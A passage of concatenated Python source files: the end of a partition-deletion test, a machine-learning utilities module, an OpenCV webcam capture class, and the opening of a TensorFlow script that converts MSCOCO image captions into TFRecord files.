except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
|
utilities.py | from __future__ import with_statement
__author__ = 'Tom Schaul, tom@idsia.ch; Justin Bayer, bayerj@in.tum.de'
import gc
import pickle
import logging
import threading
import os
import operator
from itertools import count
from math import sqrt
from random import random, choice
from string import split
from scipy import where, array, exp, zeros, size, mat, median
# file extension for load/save protocol mapping
known_extensions = {
'mat': 'matlab',
'txt': 'ascii',
'svm': 'libsvm',
'pkl': 'pickle',
'nc' : 'netcdf' }
def abstractMethod():
""" This should be called when an abstract method is called that should have been
implemented by a subclass. It should not be called in situations where no implementation
(i.e. a 'pass' behavior) is acceptable. """
raise NotImplementedError('Method not implemented!')
def drawIndex(probs, tolerant=False):
""" Draws an index given an array of probabilities.
:key tolerant: if set to True, the array is normalized to sum to 1. """
    if not (0.99999 < sum(probs) < 1.00001):
if tolerant:
probs /= sum(probs)
else:
print probs, 1 - sum(probs)
raise ValueError()
r = random()
s = 0
for i, p in enumerate(probs):
s += p
if s > r:
return i
return choice(range(len(probs)))
def drawGibbs(vals, temperature=1.):
""" Return the index of the sample drawn by a softmax (Gibbs). """
if temperature == 0:
# randomly pick one of the values with the max value.
m = max(vals)
best = []
for i, v in enumerate(vals):
if v == m:
best.append(i)
return choice(best)
else:
temp = vals / temperature
# make sure we keep the exponential bounded (between +20 and -20)
temp += 20 - max(temp)
if min(temp) < -20:
for i, v in enumerate(temp):
if v < -20:
temp[i] = -20
temp = exp(temp)
temp /= sum(temp)
return drawIndex(temp)
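def _demo_draw():
    # Illustrative sketch, not part of the original module: drawIndex samples
    # an index in proportion to the given probabilities, while drawGibbs
    # applies a softmax over raw values first.
    counts = zeros(3)
    for _dummy in range(1000):
        counts[drawIndex(array([0.2, 0.5, 0.3]))] += 1
    # counts is roughly [200, 500, 300]; at temperature 0 the Gibbs draw is
    # always the argmax index, here 2.
    return counts, drawGibbs(array([1., 2., 3.]), temperature=0.)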
def iterCombinations(tup):
""" all possible of integer tuples of the same dimension than tup, and each component being
positive and strictly inferior to the corresponding entry in tup. """
if len(tup) == 1:
for i in range(tup[0]):
yield (i,)
elif len(tup) > 1:
for prefix in iterCombinations(tup[:-1]):
for i in range(tup[-1]):
yield tuple(list(prefix) + [i])
def setAllArgs(obj, argdict):
""" set all those internal variables which have the same name than an entry in the
given object's dictionary.
This function can be useful for quick initializations. """
xmlstore = isinstance(obj, XMLBuildable)
for n in argdict.keys():
if hasattr(obj, n):
setattr(obj, n, argdict[n])
if xmlstore:
obj.argdict[n] = argdict[n]
else:
print 'Warning: parameter name', n, 'not found!'
if xmlstore:
if not hasattr(obj, '_unknown_argdict'):
obj._unknown_argdict = {}
obj._unknown_argdict[n] = argdict[n]
def linscale(d, lim):
""" utility function to linearly scale array d to the interval defined by lim """
    # note: divide by the value range so the output actually spans lim
    return (d - d.min()) / (d.max() - d.min()) * (lim[1] - lim[0]) + lim[0]
def percentError(out, true):
""" return percentage of mismatch between out and target values (lists and arrays accepted) """
arrout = array(out).flatten()
wrong = where(arrout != array(true).flatten())[0].size
return 100. * float(wrong) / float(arrout.size)
def formatFromExtension(fname):
"""Tries to infer a protocol from the file extension."""
_base, ext = os.path.splitext(fname)
if not ext:
return None
try:
format = known_extensions[ext.replace('.', '')]
except KeyError:
format = None
return format
class XMLBuildable(object):
""" subclasses of this can be losslessly stored in XML, and
automatically reconstructed on reading. For this they need to store
their construction arguments in the variable <argdict>. """
argdict = None
def setArgs(self, **argdict):
if not self.argdict:
self.argdict = {}
setAllArgs(self, argdict)
class Serializable(object):
"""Class that implements shortcuts to serialize an object.
Serialization is done by various formats. At the moment, only 'pickle' is
supported.
"""
def saveToFileLike(self, flo, format=None, **kwargs):
"""Save the object to a given file like object in the given format.
"""
format = 'pickle' if format is None else format
save = getattr(self, "save_%s" % format, None)
if save is None:
raise ValueError("Unknown format '%s'." % format)
save(flo, **kwargs)
@classmethod
def loadFromFileLike(cls, flo, format=None):
"""Load the object to a given file like object with the given protocol.
"""
format = 'pickle' if format is None else format
load = getattr(cls, "load_%s" % format, None)
if load is None:
raise ValueError("Unknown format '%s'." % format)
return load(flo)
def saveToFile(self, filename, format=None, **kwargs):
"""Save the object to file given by filename."""
if format is None:
# try to derive protocol from file extension
format = formatFromExtension(filename)
with file(filename, 'wb') as fp:
self.saveToFileLike(fp, format, **kwargs)
@classmethod
def loadFromFile(cls, filename, format=None):
"""Return an instance of the class that is saved in the file with the
given filename in the specified format."""
if format is None:
# try to derive protocol from file extension
format = formatFromExtension(filename)
with file(filename, 'rbU') as fp:
obj = cls.loadFromFileLike(fp, format)
obj.filename = filename
return obj
def save_pickle(self, flo, protocol=0):
pickle.dump(self, flo, protocol)
@classmethod
def load_pickle(cls, flo):
return pickle.load(flo)
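# Illustrative usage sketch, not part of the original module: any subclass of
# Serializable can round-trip through pickle ('/tmp/obj.pkl' is a hypothetical
# path):
#
#   class Point(Serializable):
#       def __init__(self, x):
#           self.x = x
#   Point(3).saveToFile('/tmp/obj.pkl', format='pickle')
#   p = Point.loadFromFile('/tmp/obj.pkl', format='pickle')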
class Named(XMLBuildable):
"""Class whose objects are guaranteed to have a unique name."""
_nameIds = count(0)
def getName(self):
logging.warning("Deprecated, use .name property instead.")
return self.name
def setName(self, newname):
logging.warning("Deprecated, use .name property instead.")
self.name = newname
def _getName(self):
"""Returns the name, which is generated if it has not been already."""
if self._name is None:
self._name = self._generateName()
return self._name
def _setName(self, newname):
"""Change name to newname. Uniqueness is not guaranteed anymore."""
self._name = newname
_name = None
name = property(_getName, _setName)
def _generateName(self):
"""Return a unique name for this object."""
return "%s-%i" % (self.__class__.__name__, self._nameIds.next())
def __repr__(self):
""" The default representation of a named object is its name. """
return "<%s '%s'>" % (self.__class__.__name__, self.name)
def fListToString(a_list, a_precision=3):
""" Returns a string representing a list of floats with a given precision """
s_list = ", ".join(("%g" % round(x, a_precision)).ljust(a_precision+3)
for x in a_list)
return "[%s]" % s_list
def tupleRemoveItem(tup, index):
""" remove the item at position index of the tuple and return a new tuple. """
l = list(tup)
return tuple(l[:index] + l[index + 1:])
def confidenceIntervalSize(stdev, nbsamples):
""" Determine the size of the confidence interval, given the standard deviation and the number of samples.
t-test-percentile: 97.5%, infinitely many degrees of freedom,
therefore on the two-sided interval: 95% """
# CHECKME: for better precision, maybe get the percentile dynamically, from the scipy library?
return 2 * 1.98 * stdev / sqrt(nbsamples)
def trace(func):
def inner(*args, **kwargs):
print "%s: %s, %s" % (func.__name__, args, kwargs)
return func(*args, **kwargs)
return inner
def threaded(callback=lambda * args, **kwargs: None, daemonic=False):
"""Decorate a function to run in its own thread and report the result
by calling callback with it."""
def innerDecorator(func):
def inner(*args, **kwargs):
target = lambda: callback(func(*args, **kwargs))
t = threading.Thread(target=target)
t.setDaemon(daemonic)
t.start()
return inner
return innerDecorator
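def _demo_threaded():
    # Illustrative sketch, not part of the original module: run a function in
    # a background thread and collect its return value via the callback.
    results = []
    @threaded(callback=results.append)
    def compute():
        return 21 * 2
    compute()
    return results  # [42] once the background thread has finished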
def garbagecollect(func):
"""Decorate a function to invoke the garbage collector after each execution.
"""
def inner(*args, **kwargs):
result = func(*args, **kwargs)
gc.collect()
return result
return inner
def memoize(func):
"""Decorate a function to 'memoize' results by holding it in a cache that
maps call arguments to returns."""
cache = {}
def inner(*args, **kwargs):
# Dictionaries and lists are unhashable
args = tuple(args)
# Make a set for checking in the cache, since the order of
# .iteritems() is undefined
kwargs_set = frozenset(kwargs.iteritems())
if (args, kwargs_set) in cache:
result = cache[args, kwargs_set]
else:
result = func(*args, **kwargs)
cache[args, kwargs_set] = result
return result
return inner
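def _demo_memoize():
    # Illustrative sketch, not part of the original module: repeated calls
    # with the same arguments are served from the cache.
    calls = [0]
    @memoize
    def slow_square(x):
        calls[0] += 1
        return x * x
    slow_square(4)
    slow_square(4)
    return calls[0]  # 1: the second call never reached slow_square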
def storeCallResults(obj, verbose=False):
"""Pseudo-decorate an object to store all evaluations of the function in the returned list."""
results = []
oldcall = obj.__class__.__call__
def newcall(*args, **kwargs):
result = oldcall(*args, **kwargs)
results.append(result)
if verbose:
print result
return result
obj.__class__.__call__ = newcall
return results
def multiEvaluate(repeat):
"""Decorate a function to evaluate repeatedly with the same arguments, and return the average result """
def decorator(func):
def inner(*args, **kwargs):
result = 0.
for dummy in range(repeat):
result += func(*args, **kwargs)
return result / repeat
return inner
return decorator
def _import(name):
"""Return module from a package.
These two are equivalent:
> from package import module as bar
> bar = _import('package.module')
"""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
try:
mod = getattr(mod, comp)
except AttributeError:
raise ImportError("No module named %s" % mod)
return mod
# tools for binary Gray code manipulation:
def int2gray(i):
""" Returns the value of an integer in Gray encoding."""
return i ^ (i >> 1)
def gray2int(g, size):
""" Transforms a Gray code back into an integer. """
res = 0
for i in reversed(range(size)):
gi = (g >> i) % 2
if i == size - 1:
bi = gi
else:
bi = bi ^ gi
res += bi * 2 ** i
return res
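def _demo_gray_roundtrip(size=4):
    # Illustrative sketch, not part of the original module: converting to Gray
    # code and back is lossless for a fixed bit width, e.g. int2gray(5) == 7
    # (binary 101 -> 111) and gray2int(7, 3) == 5.
    return all(gray2int(int2gray(i), size) == i for i in range(2 ** size))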
def asBinary(i):
""" Produces a string from an integer's binary representation.
(preceding zeros removed). """
if i > 1:
if i % 2 == 1:
return asBinary(i >> 1) + '1'
else:
return asBinary(i >> 1) + '0'
else:
return str(i)
def one_to_n(val, maxval):
""" Returns a 1-in-n binary encoding of a non-negative integer. """
a = zeros(maxval, float)
a[val] = 1.
return a
def n_to_one(arr):
""" Returns the reverse of a 1-in-n binary encoding. """
return where(arr == 1)[0][0]
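def _demo_one_hot():
    # Illustrative sketch, not part of the original module: one_to_n builds a
    # one-hot vector and n_to_one recovers the index.
    v = one_to_n(2, 5)  # array([0., 0., 1., 0., 0.])
    return n_to_one(v)  # 2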
def canonicClassString(x):
""" the __class__ attribute changed from old-style to new-style classes... """
if isinstance(x, object):
return split(repr(x.__class__), "'")[1]
else:
return repr(x.__class__)
def decrementAny(tup):
""" the closest tuples to tup: decrementing by 1 along any dimension.
Never go into negatives though. """
res = []
for i, x in enumerate(tup):
if x > 0:
res.append(tuple(list(tup[:i]) + [x - 1] + list(tup[i + 1:])))
return res
def reachable(stepFunction, start, destinations, _alreadyseen=None):
""" Determines the subset of destinations that can be reached from a set of starting positions,
while using stepFunction (which produces a list of neighbor states) to navigate.
Uses breadth-first search.
Returns a dictionary with reachable destinations and their distances.
"""
if len(start) == 0 or len(destinations) == 0:
return {}
if _alreadyseen is None:
_alreadyseen = []
_alreadyseen.extend(start)
# dict with distances to destinations
res = {}
    for s in list(start):  # iterate over a copy, since start is mutated below
if s in destinations:
res[s] = 0
start.remove(s)
# do one step
new = set()
for s in start:
new.update(stepFunction(s))
new.difference_update(_alreadyseen)
ndestinations = list(destinations)
for s in list(new):
if s in destinations:
res[s] = 1
new.remove(s)
ndestinations.remove(s)
_alreadyseen.append(s)
# recursively do the rest
deeper = reachable(stepFunction, new, ndestinations, _alreadyseen)
# adjust distances
for k, val in deeper.items():
res[k] = val + 1
return res
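def _demo_reachable():
    # Illustrative sketch, not part of the original module: on the integer
    # line with steps of +/-1, both 2 and -2 lie two steps away from 0.
    step = lambda s: [s - 1, s + 1]
    return reachable(step, [0], [2, -2])  # {2: 2, -2: 2}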
def flood(stepFunction, fullSet, initSet, relevant=None):
""" Returns a list of elements of fullSet linked to some element of initSet
through the neighborhood-setFunction (which must be defined on all elements of fullSet).
:key relevant: (optional) list of relevant elements: stop once all relevant elements are found.
"""
if fullSet is None:
flooded = set(initSet)
else:
full = set(fullSet)
flooded = full.intersection(set(initSet))
if relevant is None:
relevant = full.copy()
if relevant:
relevant = set(relevant)
change = flooded.copy()
while len(change)>0:
new = set()
for m in change:
if fullSet is None:
new.update(stepFunction(m))
else:
new.update(full.intersection(stepFunction(m)))
change = new.difference(flooded)
flooded.update(change)
if relevant is not None and relevant.issubset(flooded):
break
return list(flooded)
def crossproduct(ss, row=None, level=0):
"""Returns the cross-product of the sets given in `ss`."""
if row is None:
row = []
if len(ss) > 1:
return reduce(operator.add,
[crossproduct(ss[1:], row + [i], level + 1) for i in ss[0]])
else:
return [row + [i] for i in ss[0]]
def permute(arr, permutation):
"""Return an array like arr but with elements permuted.
Only the first dimension is permuted, which makes it possible to permute
blocks of the input.
arr can be anything as long as it's indexable."""
return array([arr[i] for i in permutation])
def permuteToBlocks(arr, blockshape):
"""Permute an array so that it consists of linearized blocks.
Example: A two-dimensional array of the form
0 1 2 3
4 5 6 7
8 9 10 11
12 13 14 15
would be turned into an array like this with (2, 2) blocks:
0 1 4 5 2 3 6 7 8 9 12 13 10 11 14 15
"""
if len(blockshape) < 2:
raise ValueError("Need more than one dimension.")
elif len(blockshape) == 2:
blockheight, blockwidth = blockshape
return permuteToBlocks2d(arr, blockheight, blockwidth)
elif len(blockshape) == 3:
blockdepth, blockheight, blockwidth = blockshape
return permuteToBlocks3d(arr, blockdepth, blockheight, blockwidth)
else:
raise NotImplementedError("Only for dimensions 2 and 3.")
def permuteToBlocks3d(arr, blockdepth, blockheight, blockwidth):
depth, height, width = arr.shape
arr_ = arr.reshape(height * depth, width)
arr_ = permuteToBlocks2d(arr_, blockheight, blockwidth)
arr_.shape = depth, height * width
return permuteToBlocks2d(arr_, blockdepth, blockwidth * blockheight)
def permuteToBlocks2d(arr, blockheight, blockwidth):
_height, width = arr.shape
arr = arr.flatten()
new = zeros(size(arr))
for i in xrange(size(arr)):
blockx = (i % width) / blockwidth
blocky = i / width / blockheight
blockoffset = blocky * width / blockwidth + blockx
blockoffset *= blockwidth * blockheight
inblockx = i % blockwidth
inblocky = (i / width) % blockheight
j = blockoffset + inblocky * blockwidth + inblockx
new[j] = arr[i]
return new
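def _demo_permute_blocks():
    # Illustrative check, not part of the original module, of the docstring
    # example above: a 4x4 matrix of 0..15 linearized into (2, 2) blocks.
    m = array(range(16)).reshape(4, 4)
    return permuteToBlocks(m, (2, 2))
    # -> [0, 1, 4, 5, 2, 3, 6, 7, 8, 9, 12, 13, 10, 11, 14, 15]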
def triu2flat(m):
""" Flattens an upper triangular matrix, returning a vector of the
non-zero elements. """
dim = m.shape[0]
res = zeros(dim * (dim + 1) / 2)
index = 0
for row in range(dim):
res[index:index + dim - row] = m[row, row:]
index += dim - row
return res
def flat2triu(a, dim):
""" Produces an upper triangular matrix of dimension dim from the elements of the given vector. """
res = zeros((dim, dim))
index = 0
for row in range(dim):
res[row, row:] = a[index:index + dim - row]
index += dim - row
return res
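def _demo_triu_roundtrip():
    # Illustrative sketch, not part of the original module: flattening an
    # upper triangular matrix and rebuilding it recovers the original.
    m = zeros((3, 3))
    m[0, :] = [1, 2, 3]
    m[1, 1:] = [4, 5]
    m[2, 2] = 6
    return (flat2triu(triu2flat(m), 3) == m).all()  # True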
def blockList2Matrix(l):
""" Converts a list of matrices into a corresponding big block-diagonal one. """
dims = [m.shape[0] for m in l]
s = sum(dims)
res = zeros((s, s))
index = 0
for i in range(len(l)):
d = dims[i]
m = l[i]
res[index:index + d, index:index + d] = m
index += d
return res
def blockCombine(l):
""" Produce a matrix from a list of lists of its components. """
l = [map(mat, row) for row in l]
hdims = [m.shape[1] for m in l[0]]
hs = sum(hdims)
vdims = [row[0].shape[0] for row in l]
vs = sum(vdims)
    res = zeros((vs, hs))  # rows span the vertical dims, columns the horizontal ones
vindex = 0
for i, row in enumerate(l):
hindex = 0
for j, m in enumerate(row):
res[vindex:vindex + vdims[i], hindex:hindex + hdims[j]] = m
hindex += hdims[j]
vindex += vdims[i]
return res
def avgFoundAfter(decreasingTargetValues, listsOfActualValues, batchSize=1, useMedian=False):
""" Determine the average number of steps to reach a certain value (for the first time),
given a list of value sequences.
If a value is not always encountered, the length of the longest sequence is used.
Returns an array. """
from scipy import sum
numLists = len(listsOfActualValues)
longest = max(map(len, listsOfActualValues))
# gather a list of indices of first encounters
res = [[0] for _ in range(numLists)]
for tval in decreasingTargetValues:
for li, l in enumerate(listsOfActualValues):
lres = res[li]
found = False
for i in range(lres[-1], len(l)):
if l[i] <= tval:
lres.append(i)
found = True
break
if not found:
lres.append(longest)
tmp = array(res)
if useMedian:
resx = median(tmp, axis=0)[1:]
else:
resx = sum(tmp, axis=0)[1:] / float(numLists)
return resx * batchSize
class DivergenceError(Exception):
""" Raised when an algorithm diverges. """
def matchingDict(d, selection, require_existence=False):
""" Determines if the dictionary d conforms to the specified selection,
i.e. if a (key, x) is in the selection, then if key is in d as well it must be x
or contained in x (if x is a list). """
for k, v in selection.items():
if k in d:
if isinstance(v, list):
if d[k] not in v:
return False
else:
if d[k] != v:
return False
elif require_existence:
return False
return True
def subDict(d, allowedkeys, flip=False):
""" Returns a new dictionary with a subset of the entries of d
    that have one of the (dis-)allowed keys."""
res = {}
for k, v in d.items():
if (k in allowedkeys) ^ flip:
res[k] = v
return res
def dictCombinations(listdict):
""" Iterates over dictionaries that go through every possible combination
of key-value pairs as specified in the lists of values for each key in listdict."""
listdict = listdict.copy()
if len(listdict) == 0:
return [{}]
k, vs = listdict.popitem()
res = dictCombinations(listdict)
if isinstance(vs, list) or isinstance(vs, tuple):
res = [dict(d, **{k:v}) for d in res for v in sorted(set(vs))]
else:
res = [dict(d, **{k:vs}) for d in res]
return res
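def _demo_dict_combinations():
    # Illustrative sketch, not part of the original module; the order of the
    # returned dictionaries depends on dict iteration order.
    return dictCombinations({'a': [1, 2], 'b': 'x'})
    # -> [{'a': 1, 'b': 'x'}, {'a': 2, 'b': 'x'}]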
def r_argmax(v):
""" Acts like scipy argmax, but break ties randomly. """
if len(v) == 1:
return 0
maxbid = max(v)
maxbidders = [i for (i, b) in enumerate(v) if b==maxbid]
return choice(maxbidders)
def all_argmax(x):
""" Return the indices of all values that are equal to the maximum: no breaking ties. """
m = max(x)
return [i for i, v in enumerate(x) if v == m]
def dense_orth(dim):
""" Constructs a dense orthogonal matrix. """
from scipy import rand
from scipy.linalg import orth
return orth(rand(dim, dim))
def sparse_orth(d):
""" Constructs a sparse orthogonal matrix.
The method is described in:
Gi-Sang Cheon et al., Constructions for the sparsest orthogonal matrices,
    Bull. Korean Math. Soc. 36 (1999) No. 1, pp. 119-129
"""
from scipy.sparse import eye
from scipy import r_, pi, sin, cos
if d%2 == 0:
seq = r_[0:d:2,1:d-1:2]
else:
seq = r_[0:d-1:2,1:d:2]
Q = eye(d,d).tocsc()
for i in seq:
theta = random() * 2 * pi
        flip = (random() - 0.5) > 0
Qi = eye(d,d).tocsc()
Qi[i,i] = cos(theta)
Qi[(i+1),i] = sin(theta)
if flip > 0:
Qi[i,(i+1)] = -sin(theta)
Qi[(i+1),(i+1)] = cos(theta)
else:
Qi[i,(i+1)] = sin(theta)
Qi[(i+1),(i+1)] = -cos(theta)
        Q = Q * Qi
return Q
def xhash(arr):
""" Hashing function for arrays. Use with care. """
import hashlib
return hashlib.sha1(arr).hexdigest()
def binArr2int(arr):
""" Convert a binary array into its (long) integer representation. """
from numpy import packbits
tmp2 = packbits(arr.astype(int))
return sum(val * 256 ** i for i, val in enumerate(tmp2[::-1]))
def uniqueArrays(vs):
""" create a set of arrays """
resdic = {}
for v in vs:
resdic[xhash(v)] = v
return resdic.values()
def seedit(seed=0):
""" Fixed seed makes for repeatability, but there may be two different
random number generators involved. """
import random
import numpy
random.seed(seed)
numpy.random.seed(seed)
def weightedUtest(g1, w1, g2, w2):
""" Determines the confidence level of the assertion:
'The values of g2 are higher than those of g1'.
(adapted from the scipy.stats version)
Twist: here the elements of each group have associated weights,
corresponding to how often they are present (i.e. two identical entries with
weight w are equivalent to one entry with weight 2w).
Reference: "Studies in Continuous Black-box Optimization", Schaul, 2011 [appendix B].
TODO: make more efficient for large sets.
"""
from scipy.stats.distributions import norm
import numpy
n1 = sum(w1)
n2 = sum(w2)
u1 = 0.
for x1, wx1 in zip(g1, w1):
for x2, wx2 in zip(g2, w2):
if x1 == x2:
u1 += 0.5 * wx1 * wx2
elif x1 > x2:
u1 += wx1 * wx2
mu = n1*n2/2.
sigu = numpy.sqrt(n1*n2*(n1+n2+1)/12.)
z = (u1 - mu) / sigu
conf = norm.cdf(z)
return conf
|
GenericWebcam.py | #!/usr/bin/env python3
# coding: utf-8
# Code parts for asynchronous video capture taken from
# http://blog.blitzblit.com/2017/12/24/asynchronous-video-capture-in-python-with-opencv/
import cv2
import threading
from VIGITIA_toolkit.core.VIGITIACameraBase import VIGITIACameraBase
CAMERA_ID = 0
RES_X = 1920
RES_Y = 720
FPS = 30
class GenericWebcam(VIGITIACameraBase):
frame = None
def __init__(self, ):
super().__init__('Generic Webcam')
self.add_video_stream('color', 'bgr8', RES_X, RES_Y, FPS,
'Color Stream')
self.started = False
self.read_lock = threading.Lock()
def init_video_capture(self, camera_id=CAMERA_ID, resolution_x=RES_X, resolution_y=RES_Y, fps=FPS):
self.capture = cv2.VideoCapture(camera_id)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, resolution_x)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, resolution_y)
self.capture.set(cv2.CAP_PROP_FPS, fps)
def start(self):
if self.started:
print('Already running')
return None
else:
self.started = True
self.thread = threading.Thread(target=self.update, args=())
# thread.daemon = True
self.thread.start()
return self
def update(self):
while self.started:
ret, frame = self.capture.read()
if frame is not None:
with self.read_lock:
self.frame = frame
def get_frames(self):
with self.read_lock:
return self.frame, None
def get_resolution(self):
return RES_X, RES_Y
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.capture.release()
# Usage sketch: initialize the capture device before starting, and note that
# get_frames() returns a tuple whose first element is the color frame.
# webcam = GenericWebcam()
# webcam.init_video_capture()
# webcam.start()
#
# while True:
#     frame, _ = webcam.get_frames()
#     if frame is not None:
#         cv2.imshow('webcam', frame)
#
#     if cv2.waitKey(1) & 0xFF == ord('q'):
#         break
#
# cv2.destroyAllWindows() |
build_mscoco_data.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_train2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with open(image.filename, "r") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
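def _parse_sequence_example_sketch(serialized):
  """Illustrative sketch, not part of the original script: how a record
  written by _to_sequence_example could be parsed back with the TF 1.x API.
  The feature names mirror the ones defined above.
  """
  context, sequence = tf.parse_single_sequence_example(
      serialized,
      context_features={
          "image/image_id": tf.FixedLenFeature([], dtype=tf.int64),
          "image/data": tf.FixedLenFeature([], dtype=tf.string),
      },
      sequence_features={
          "image/caption": tf.FixedLenSequenceFeature([], dtype=tf.string),
          "image/caption_ids": tf.FixedLenSequenceFeature([], dtype=tf.int64),
      })
  return context["image/data"], sequence["image/caption_ids"]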
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
thread_index: Integer thread identifier within [0, len(ranges)].
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
